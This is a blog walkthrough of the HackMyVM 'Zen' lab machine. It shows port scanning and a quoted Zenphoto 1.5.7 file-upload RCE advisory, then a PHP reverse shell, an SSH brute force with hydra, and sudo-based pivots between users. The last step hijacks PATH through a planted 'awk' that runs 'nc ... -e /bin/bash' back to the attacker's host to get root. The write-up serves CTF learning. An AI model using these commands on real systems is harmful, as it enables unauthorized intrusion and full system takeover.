Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Zen Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100   
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
 |   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
 |_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 9 disallowed entries
 | /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
 |_/zp-data/ /page/search/ /uploaded/ /backup/
 |_http-server-header: nginx/1.14.2
 |_http-title: Galer\xC3\xADa
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel    

From the main page, get the app name and version number.

 ~ curl http://192.168.56.99
 <!DOCTYPE html>  
 ...
 </body>
 </html>
 <!-- zenphoto version 1.5.7 -->

Googling zenphoto version 1.5.7 shows that it has an authenticated file upload vulnerability.

             Authenticated arbitrary file upload to RCE
 
 Product : Zenphoto
 Affected : Zenphoto CMS - <= 1.5.7
 Attack Type : Remote
 
 login then go to plugins then go to uploader and press on the check box elFinder
 then press apply , after that you go to upload then Files(elFinder) drag and drop
 any malicious php code after that go to /uploaded/ and your php code
 
 --------------------------------------------------------------------------------------------
 Zenphoto through 1.5.7 is affected by authenticated arbitrary file
 upload, leading to remote code execution. The attacker must navigate to
 the uploader plugin, check the elFinder box, and then drag and drop
 files into the Files(elFinder) portion of the UI. This can, for
 example, place a .php file in the server's uploaded/ directory.
 
 [Reference]
 https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
 https://twitter.com/3almisfer
 https://github.com/azizalshammari/

In robots.txt we found a strange string: P@ssw0rd.

Find the zenphoto login panel at /zp-core/admin.php and log in with admin:P@ssw0rd.

Upload a PHP shell and get a reverse shell.

 & kali @ mykali in ~/Documents/zen 0 [13:57:14]
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38120.
 Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
  20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~/Documents/zen 0 [14:05:51]
 ~ curl http://192.168.56.99/backup/r.php

Found 3 users in the home folder.

 www-data@zen:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
 drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
 drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
 drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
 drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster

Because we can find no way to escalate to any of these 3 users, we can only bruteforce SSH credentials.

 ~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F                                       ...
 [DATA] attacking ssh://192.168.56.99:22/
 [22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster

Login as zenmaster, escalate to kodo.

 zenmaster@zen:~$ sudo -l
 Matching Defaults entries for zenmaster on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User zenmaster may run the following commands on zen:
     (kodo) NOPASSWD: /bin/bash
 zenmaster@zen:~$ sudo -u kodo /bin/bash -p

As user kodo, check sudo -l: /usr/bin/see can be run as hua. Use its edit function, press !:/bin/bash inside the editor, and escalate to user hua.

 kodo@zen:/home/zenmaster$ sudo -l
 Matching Defaults entries for kodo on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User kodo may run the following commands on zen:
     (hua) NOPASSWD: /usr/bin/see
 kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
 hua@zen:/home/zenmaster$ id
 uid=1002(hua) gid=1002(hua) groups=1002(hua)

Check sudo -l.

 hua@zen:/tmp$ sudo -l
 Matching Defaults entries for hua on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User hua may run the following commands on zen:
     (ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen

We can write to /usr/local/bin.

 hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null  
 ...
 /tmp/.X11-unix
 /usr/local/bin
 /usr/lib/systemd/system/mountnfs-bootclean.service
 ...

Use strace to trace add-shell: it looks for awk, cat and rm via PATH, and /usr/local/bin (listed before /usr/bin in sudo's secure_path) is searched first, where they don't exist.

 hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
 stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
 stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
 stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
 hua@zen:/tmp$ ls -la /usr/local/bin/awk
 ls: cannot access '/usr/local/bin/awk': No such file or directory
 hua@zen:/tmp$ ls -la /usr/local/bin/cat
 ls: cannot access '/usr/local/bin/cat': No such file or directory
 hua@zen:/tmp$ ls -la /usr/local/bin/rm
 ls: cannot access '/usr/local/bin/rm': No such file or directory

Since /usr/local/bin is writable, we can write a reverse shell into /usr/local/bin/awk, run add-shell with sudo, and get a root shell.

 hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk 
 hua@zen:/tmp$ chmod +x /usr/local/bin/awk
 hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~ 0 [15:25:33]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38124.
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 zen
